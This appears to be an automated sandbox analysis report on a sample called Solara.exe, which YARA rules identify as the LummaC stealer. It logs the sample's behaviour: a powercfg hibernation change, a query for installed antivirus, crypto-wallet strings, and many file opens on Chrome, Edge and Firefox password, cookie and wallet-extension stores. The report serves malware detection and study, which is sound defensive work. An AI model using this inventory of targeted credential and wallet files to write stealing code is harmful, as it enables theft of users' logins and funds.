Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Code function: 0_2_0093E6D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0093E6D7

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0			Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Solara.exe.bin.exe, 00000002.00000003.1017938838.0000000001266000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.996421655.0000000001262000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Solara.exe.bin.exe, 00000002.00000003.996006601.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.996726708.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2172359493.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.996079909.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.995513345.0000000001274000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 2.2.Solara.exe.bin.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Solara.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2169158568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Solara.exe.bin.exe, 00000002.00000003.996006601.00000000011DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: Solara.exe.bin.exe, 00000002.00000003.996006601.00000000011DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Solara.exe.bin.exe, 00000002.00000003.974203654.000000000124E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx LibertynC
Source: Solara.exe.bin.exe, 00000002.00000003.996006601.00000000011DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Solara.exe.bin.exe, 00000002.00000003.974422341.00000000011F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Solara.exe.bin.exe, 00000002.00000003.974203654.0000000001221000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: Solara.exe.bin.exe, 00000002.00000003.996006601.00000000011DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: Solara.exe.bin.exe, 00000002.00000003.974297220.00000000011B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Solara.exe.bin.exe, 00000002.00000003.974203654.0000000001221000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
